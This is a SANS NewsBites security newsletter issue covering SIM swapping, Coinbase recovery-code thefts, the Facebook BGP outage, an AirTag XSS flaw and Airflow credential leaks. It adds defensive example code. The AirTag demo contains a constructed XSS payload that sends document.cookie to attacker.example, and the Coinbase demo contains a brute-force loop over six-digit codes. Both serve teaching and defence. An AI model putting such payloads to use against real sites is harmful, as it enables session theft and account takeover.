SANS NewsBites

FCC Wants to Make SIM Swapping Attacks Less Likely to Succeed; Vulnerable MFA Recovery Process Used to Steal Cryptocurrency from Coinbase; Faulty Facebook BGP Update Likely Cause of Outage

October 5, 2021  |  Volume XXIII - Issue #78

Top of the News


2021-10-01

FCC Proposed Rulemaking to Fight SIM Swapping

The US Federal Communications Commission (FCC) is seeking feedback on its proposed rulemaking regarding SIM swapping and number port-out fraud. Both attacks hijack a victim’s mobile phone number and, with it, any accounts that rely on that number for authentication or account recovery. The draft rulemaking “proposes to amend the Customer Proprietary Network Information (CPNI) and Local Number Portability rules to require carriers to adopt secure methods of authenticating a customer before redirecting a customer’s phone number to a new device or carrier. It also proposes requiring providers to immediately notify customers whenever a SIM change or port request is made on customers’ accounts.”

Editor's Note

Good to see the FCC finally taking action on this longstanding problem. Last year, Princeton researchers showed how shoddy SIM swapping authorization and authentication processes were still in use by most carriers. Next maybe the FCC will address the ease of cell number spoofing.

John Pescatore

Make sure that you’ve checked the security settings on your mobile account relating to SIM swapping. Some of the carriers have updated their controls, such as requiring that an added PIN be created to authorize a legitimate swap. Even so, the wording can be tricky and should be read carefully. When setting up 2FA, select options other than SMS or a call to your mobile, and when those are the only choices, they are still better than a reusable password.

Lee Neely

This is a hard problem. Carriers want to resist the small number of fraudulent swaps while not inefficiently burdening the large number of legitimate (lost, stolen, broken or new phones) swaps. At a minimum carriers should confirm all swaps out-of-band. Not expensive, not even necessarily inconvenient.

William Hugh Murray

2021-10-01

Coinbase MFA Vulnerability Exploited to Steal Cryptocurrency

Thieves stole cryptocurrency from at least 6,000 Coinbase customers by exploiting a weakness in Coinbase’s SMS multi-factor authentication (MFA) account recovery feature. Coinbase notified affected users last week. The thefts occurred between March and May 2021. To succeed, an attacker needed a targeted Coinbase customer’s email address, password and phone number, as well as access to the email account; the recovery flaw then let the attacker get past the SMS second factor. Coinbase has since updated its SMS Account Recovery protocol to prevent the authentication bypass.

Editor's Note

Every authentication method, from passwords to 2FA to biometrics, requires a backup authentication approach in case the primary authentication method doesn’t work. Those processes need to be tested for weaknesses, as too often they prioritize ease of use/cost reduction over security. (See the FCC/SIM swapping item above.)

John Pescatore

Coinbase does not reveal a lot of details other than saying that the flaw is related to the 2FA recovery process. So far, I have not seen a system that recovers lost 2FA securely and efficiently. Too often, recovery means answering some security questions or calling a help desk, which will again ask some recovery questions. Worse: recovery systems that are buggy and let users disable 2FA by brute forcing a simple six digit code.

Johannes Ullrich

Attackers were able to recover a user’s account, log in and transfer their funds to a non-Coinbase wallet. Coinbase has multiple MFA options, including secure keys, TOTP and SMS as a last resort. Victims who had secured their account and lost funds are being reimbursed. If you have a Coinbase or other cryptocurrency wallet, revisit MFA options to move away from SMS if possible.

Lee Neely
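Coinbase has not published what was wrong with its SMS Account Recovery flow, so the following is an added illustration of the general class of weakness the editors describe (a recovery path that lets an attacker guess a short code without limit), not Coinbase’s code or a reconstruction of its bug. It places a weak six-digit recovery-code check beside a hardened one: the hardened version expires codes, burns a code after a handful of wrong guesses, compares in constant time and accepts each code once. The class names, the 10-minute lifetime and the five-attempt limit are assumptions chosen for the example.

```python
"""Added example (not Coinbase's code): a 6-digit recovery-code check in a
weak form beside a hardened form.  Limits and names are illustrative."""
import hmac
import secrets
import time
from dataclasses import dataclass

CODE_LEN = 6
CODE_TTL_SECONDS = 600      # assumption: a recovery code lives 10 minutes
MAX_ATTEMPTS = 5            # assumption: five wrong guesses burn the code


def _random_code(rand=secrets.randbelow) -> str:
    """Zero-padded 6-digit code; `rand` is injectable so tests are deterministic."""
    return f"{rand(10 ** CODE_LEN):0{CODE_LEN}d}"


@dataclass
class Challenge:
    user_id: str
    code: str
    issued_at: float
    attempts: int = 0
    consumed: bool = False


class WeakRecovery:
    """No expiry, no attempt limit, code never consumed: a million guesses win."""

    def __init__(self):
        self._live = {}

    def issue(self, user_id, rand=secrets.randbelow):
        code = _random_code(rand)
        self._live[user_id] = code
        return code                 # in a real service the code is only ever sent by SMS

    def verify(self, user_id, guess):
        return self._live.get(user_id) == guess


class HardenedRecovery:
    """Expiring, single-use code with an attempt budget and constant-time compare."""

    def __init__(self, now=time.time):
        self._now = now             # injectable clock so expiry can be tested
        self._live: dict[str, Challenge] = {}

    def issue(self, user_id, rand=secrets.randbelow):
        code = _random_code(rand)
        self._live[user_id] = Challenge(user_id, code, self._now())
        return code

    def verify(self, user_id, guess) -> bool:
        ch = self._live.get(user_id)
        if ch is None or ch.consumed:
            return False
        if self._now() - ch.issued_at > CODE_TTL_SECONDS:
            del self._live[user_id]                     # stale code is simply gone
            return False
        ch.attempts += 1
        ok = hmac.compare_digest(ch.code.encode(), str(guess).encode())
        if ok:
            ch.consumed = True                          # one successful use only
            return True
        if ch.attempts >= MAX_ATTEMPTS:
            # Burn the code.  The attacker now has to request a fresh SMS, which
            # is itself an alert to the real owner, and gets 5 guesses in 10^6.
            del self._live[user_id]
        return False


def brute_force(service, user_id):
    """Attacker model: try every 6-digit code. Returns the code that worked, or None."""
    for n in range(10 ** CODE_LEN):
        guess = f"{n:0{CODE_LEN}d}"
        if service.verify(user_id, guess):
            return guess
    return None


if __name__ == "__main__":
    weak, hard = WeakRecovery(), HardenedRecovery()
    weak.issue("alice", rand=lambda n: 4213)   # fixed code so the demo is quick
    hard.issue("alice", rand=lambda n: 4213)
    print("weak service cracked with:", brute_force(weak, "alice"))
    print("hardened service cracked with:", brute_force(hard, "alice"))
```

The attempt budget is what turns a guessing attack into a noisy one: every five failures force a new code to be issued, and issuing a code means sending another SMS to the legitimate owner. Rate-limiting code issuance per account and per source IP, and notifying the owner of both the request and any eventual 2FA change, belong in the same flow but are left out here to keep the example short.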

2021-10-04

Bungled BGP Route Update Likely Cause of Facebook Outage on Monday

Monday’s outage affecting Facebook, Instagram, WhatsApp and other Facebook-owned properties was likely due to a bungled Border Gateway Protocol (BGP) route update. The problems began around 11:30 am EDT; Facebook services began coming back online roughly five hours later. The outage prevented some Facebook employees from entering buildings because the badge access system was not working.

Editor's Note

Outages and routing issues due to BGP mistakes are common enough that there is a website tracking them (e.g. see https://observatory.manrs.org/#/history ). For your next business continuity tabletop: Consider what will happen if your authentication servers are down due to a routing issue. Include the authentication servers used to authenticate local and remote users to make routing updates.

Johannes Ullrich

The first thing that comes to mind is that the world’s economic output probably went up for the five hours that Facebook was off the air… Some of the longest outages are due to self-inflicted wounds – some of you may even remember the 9 hour+ January 1990 ATT telecoms outage when ATT pushed out a bad software update to their switches. Just as with DDoS and ransomware incidents, how to deal with extended outages of revenue-critical services is an important tabletop exercise.

John Pescatore

Reversing the BGP update required physical access to routers which were in buildings where the physical access systems were also offline. Make sure that there is a viable contingency plan for your physical access control system. Document the use cases which require physical access to IT components, making sure you’ve not overlooked options to further minimize that access. Test your contingency physical access controls regularly. Make sure that you don’t have single points of failure. Remember the productivity losses we attributed to the Microsoft Solitaire game on Windows? Social media seems to have stepped into that role and is available from about every platform a user has, not just their Windows systems. It may be time to revisit your incidental use policy with this outage in mind.

Lee Neely

The Rest of the Week's News


2021-10-04

Apple AirTags Do Not Sanitize User Input

Apple AirTags do not sanitize the phone number field used in Lost Mode. When an AirTag is placed in Lost Mode, anyone who finds it and scans it is shown a message, presumably including the owner’s contact information. Because the phone number input field is not validated, a malicious actor can enter a malicious payload in its place, which is rendered when the tag is scanned. This enables “drop attacks,” in which AirTags carrying such a payload are strategically dropped in the hope that someone will pick one up and scan it.

Editor's Note

It is not really the AirTags that should be sanitizing user input. Instead, Apple's website displaying the link should properly encode the data to prevent XSS, and the API they use to receive the data the user configures for the link should properly validate input. The AirTag, a device the user controls, should not be used to implement security.

Johannes Ullrich

Apple AirTags are about $30, which raises the bar on a malicious actor leaving them around to be scanned by an unwitting victim, as compared to USB flash drives which can be under $1; even so, you may want to advise staff to be cautious, particularly VIPs. Two lessons here. First: input sanitization is always important, for every input. Second: respond to vulnerability disclosures. The researcher disclosed the weakness to Apple on June 20th with no response for several months despite follow-up communication. While Apple did finally respond and will be addressing this error in an upcoming update, the researcher disclosed the weakness publicly as it had not been addressed for 90 days.

Lee Neely

Apple had previously only partially addressed the stalking risk of AirTags, where the malicious actor drops an AirTag in someone’s bag or vehicle and has cheap and easy tracking. The good news is “drop attacks” are both expensive, since AirTags cost much more than USB drives, and require physical access to the target. Good to warn executives they might receive malicious AirTags in the mail, just as “poisoned” USB drives were physically mailed out over the past couple of years.

John Pescatore
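Johannes Ullrich’s point above is that the fix belongs in the service that receives and displays the Lost Mode contact details, not in the tag. The following is an added example, not Apple’s code and not the researcher’s payload, showing the two server-side controls in question for a generic “found item” page: validate the phone number on the way in (an E.164 rule is assumed here) and HTML-encode every user-controlled value on the way out. The page markup, field names and the sample payload are constructed for the example.

```javascript
// Added example, not Apple's code.  Two layers for a "found item" page:
// input validation of the contact number and output encoding of everything
// the tag owner typed.  Layout, field names and the payload are assumptions.
const E164 = /^\+[1-9]\d{1,14}$/;   // E.164: '+' then 2..15 digits, no leading zero

// Accept only something that is actually a phone number; strip visual
// formatting (spaces, dots, dashes, parentheses) before testing.
function validatePhone(input) {
  const cleaned = String(input).replace(/[\s().-]/g, '');
  return E164.test(cleaned) ? cleaned : null;
}

// Encode for the HTML text context.  Attribute and URL contexts need their
// own encoders; this page only places user data between tags.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable rendering: the owner's fields are concatenated straight into markup,
// so whatever was typed into the phone field executes in the finder's browser.
function renderUnsafe(owner) {
  return `<p>This item is lost. Contact: ${owner.phone}</p><p>${owner.message}</p>`;
}

// Hardened rendering.  Encoding alone already stops the injection; validation
// additionally refuses to store or show a "phone number" that is not one.
function renderSafe(owner) {
  const phone = validatePhone(owner.phone);
  const phoneHtml = phone === null ? 'not provided' : escapeHtml(phone);
  return `<p>This item is lost. Contact: ${phoneHtml}</p><p>${escapeHtml(owner.message)}</p>`;
}

// Constructed payload standing in for what an attacker would type into the field.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderUnsafe({ phone: PAYLOAD, message: 'please call' }));
  console.log('safe:  ', renderSafe({ phone: PAYLOAD, message: 'please call' }));
  console.log('safe:  ', renderSafe({ phone: '+1 (415) 555-0100', message: 'please call' }));
}
```

Note that the validation regex is a defence in depth, not the primary control: a finder’s browser is protected by the output encoding even when a field legitimately contains characters such as `&` or `<` (the free-text message, for instance), which is why `renderSafe` encodes the message rather than trying to validate it.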

2021-10-01

Digitization Drives Changes in Risk Management

During a virtual panel hosted by Dragos, CISOs and other experts discussed the effect of digitization on risk management in manufacturing environments and other operational technology (OT) dependent environments. Companies are starting to make the change to centralized IT and cybersecurity operations rather than site-specific cybersecurity that varies from one plant to the next.

Editor's Note

As more components are reporting and accessing OT components, isolation is becoming more challenging. Make sure that you know what systems need to interact with your OT and restrict access to only those authorized systems and users. Monitor the networks they are using for unexpected behavior, protocols, or unauthorized devices. Don’t provide direct OT connectivity to the Internet.

Lee Neely

Standardization of security is essential to efficiency, ensuring that sensitive resources get the necessary and intended protection while expensive measures are reserved to only those resources that require them.

William Hugh Murray

2021-10-01

RFID Military Weapons Tracking Poses Security Risk

An Associated Press (AP) report found that some US military units are using radio frequency identification (RFID) tags on firearms. The AP was looking into the military’s use of technology in keeping control of its firearm inventory as part of a larger investigation into stolen and missing military guns. The RFID tags are used to help with inventory. A Department of Defense (DoD) spokesperson said that department policy opposes the use of RFID tags in firearms except in very limited instances – in guns used on firing ranges, and not in those used to protect military bases or in combat. The investigation found that the tags can be read from distances considerably greater than the contractors who install the RFID systems claim, making it relatively easy for adversaries to detect US troops. In addition, the tags are easy to clone.

Editor's Note

Don’t underestimate the range at which a transmitter like RFID tags can be read. Also, be aware of the ease of duplication. Lastly, consider the OPSEC tradeoff of easy remote/touchless read versus the adversary having that information.

Lee Neely

RFID is one of those tricky technologies that often falls in the creases of security programs. Like electronic locks, “smart” home devices, industrial wireless signals, and hardware tokens, these intersectional systems are often poorly understood - even by their vendors. Recommendation: give special attention to “The Weird” in your environment. The attack surface is all around us!

Christopher Elgee

2021-10-04

Apache Airflow Misconfigurations Expose Sensitive Data

Researchers from Intezer have found that misconfigured instances of older versions of Apache Airflow, the open-source workflow orchestrator, are exposing sensitive information, including account credentials for Amazon Web Services, Google Cloud Platform, PayPal, and other platforms and services. Where customer information is among the exposed data, the organizations involved may also be in violation of data protection laws. Intezer has notified the organizations it identified as running misconfigured Airflow instances.

Editor's Note

The blog post is a great read for anybody dealing with credentials (meaning everybody...). The mistakes shown go beyond Apache Workflow. Many of the issues outlined can be found in a wide range of code dealing with storing and using credentials securely.

Johannes Ullrich

The workflows leverage stored credentials for accessing services. Review your workflows to make sure that you are not embedding credentials in scripts or variables, but rather use the connections functions to manage those credentials where they are encrypted. Even so, verify the plain-text password value wasn’t also stored in the extras field.

Lee Neely
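Lee Neely’s note above recommends keeping credentials in Airflow Connections rather than in DAG code or Variables, and then checking that a password has not also been copied into the free-form `extra` field, which is stored and displayed separately from the encrypted `password` column. The following added example (not part of Intezer’s report or the Airflow project) audits a connections dump for exactly that. It assumes the JSON layout produced by `airflow connections export` in Airflow 2 (a dict keyed by `conn_id`, with `extra` as a JSON string); the three sample connections are constructed for the example, and the AWS values are the placeholder credentials from AWS’s own documentation.

```python
"""Added example, not Intezer's or Airflow's code: flag secrets parked in the
`extra` field of exported Airflow connections.  Sample data is constructed."""
import json
import re

# Assumption: key names that signal a secret when they show up inside `extra`.
SECRET_KEYS = re.compile(r"(password|passwd|secret|token|api_key|private_key)", re.I)

# Constructed stand-in for `airflow connections export conns.json` (Airflow 2 layout).
SAMPLE_EXPORT = json.dumps({
    "aws_default": {
        "conn_type": "aws",
        "login": "AKIAIOSFODNN7EXAMPLE",                          # AWS docs placeholder key id
        "password": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",   # AWS docs placeholder secret
        # Secret duplicated into extra: legacy provider versions accepted this,
        # and `extra` is rendered in the connection UI and exported in the clear.
        "extra": json.dumps({"region_name": "us-east-1",
                             "aws_secret_access_key": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}),
    },
    "postgres_warehouse": {
        "conn_type": "postgres", "host": "db.internal", "login": "etl",
        "password": "Tr0ub4dor&3", "schema": "warehouse", "port": 5432,
        "extra": json.dumps({"sslmode": "require"}),              # fine: no secret material
    },
    "paypal_api": {
        "conn_type": "http", "host": "api.paypal.example", "login": "merchant",
        "password": None,
        "extra": '{"client_secret": "EXAMPLEsecret123"}',        # secret in extra, password unused
    },
})


def audit_connections(export_json: str) -> dict[str, list[str]]:
    """Return {conn_id: [finding, ...]} for every connection whose `extra` carries a secret.

    Two checks: a key in `extra` whose name looks like a secret, and a value in
    `extra` that is byte-for-byte the connection's own password.
    """
    findings: dict[str, list[str]] = {}
    for conn_id, conn in json.loads(export_json).items():
        issues = []
        try:
            extra = json.loads(conn.get("extra") or "{}")
        except json.JSONDecodeError:
            extra = {}                       # non-JSON extra: nothing structured to inspect
        if not isinstance(extra, dict):
            extra = {}
        password = conn.get("password")
        for key, value in extra.items():
            if not isinstance(value, str) or not value:
                continue
            if SECRET_KEYS.search(key):
                issues.append(f"secret-looking key '{key}' stored in extra")
            if password and value == password:
                issues.append(f"password duplicated into extra under '{key}'")
        if issues:
            findings[conn_id] = issues
    return findings


if __name__ == "__main__":
    for conn_id, issues in audit_connections(SAMPLE_EXPORT).items():
        for issue in issues:
            print(f"{conn_id}: {issue}")
```

Run it against a real export with `audit_connections(open("conns.json").read())` and treat every hit as a credential to rotate, not just to move: an `extra` value that has been visible in the UI or in a backup should be assumed exposed. The same key-name heuristic can be pointed at `airflow variables export` output, which is where the other class of leak Lee mentions tends to live.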

2021-09-30

Phishing Scheme Used Telegram Bots

A phishing campaign that targeted at least eight Canadian banks used Telegram-based bots to gather account access information. The bots are being used to steal one-time passwords used in two-factor authentication.

Editor's Note

While 2FA using SMS or a phone call is a huge step in the right direction, these verification methods are subject to interception. When configuring services to support MFA, enable TOTP, physical tokens, smart cards or other mechanisms not subject to interception before allowing SMS/Phone options.

Lee Neely

2021-10-04

Johnson Memorial Health in Indiana Suffers Cyberattack

Johnson Memorial Health in Indiana is operating under electronic health record (EHR) downtime following a cyberattack on October 2. Johnson officials say that no appointments or surgeries have been cancelled. Another Indiana healthcare provider, Schneck Medical Center, was hit with a cyberattack in late September. A third Indiana healthcare provider, Eskenazi Health, experienced a cyberattack in August, which resulted in the theft of patient and employee data.

Editor's Note

They are operating under EHR downtime procedures, which were previously established and tested. Consider the viability of operating with key systems offline. Make contingency plans accordingly. If operation without those systems is not viable, and a suitable option cannot be determined, engage senior management before you consider that not operating is an acceptable alternative.

Lee Neely

Criminals are disproportionately targeting healthcare. Patients are put at risk of injury and death and clinical data is being lost that will never be recovered.

William Hugh Murray

Internet Storm Center Tech Corner

Facebook Outage

https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/


Boutique "Dark" Botnet Hunting for Crumbs

https://isc.sans.edu/forums/diary/Boutique+Dark+Botnet+Hunting+for+Crumbs/27898/


A New Tool To Add to Your LOLBAS List: cvtres.exe

https://isc.sans.edu/forums/diary/New+Tool+to+Add+to+Your+LOLBAS+List+cvtresexe/27892/


Cyber Security Awareness Month

https://www.sans.org/security-awareness-training/resources/

https://isc.sans.edu/tag.html?tag=csam


Apache Airflow May Leak Credentials

https://www.intezer.com/blog/cloud-security/misconfigured-airflows-leak-credentials/


FCC Attempts to Fight SIM Swapping

https://docs.fcc.gov/public/attachments/DOC-376199A1.pdf


Google Chrome Continuing Updates

https://support.google.com/chrome/answer/95414?hl=en&co=GENIE.Platform%3DDesktop


MacOS Gatekeeper Bypass

https://labs.f-secure.com/blog/the-discovery-of-cve-2021-1810/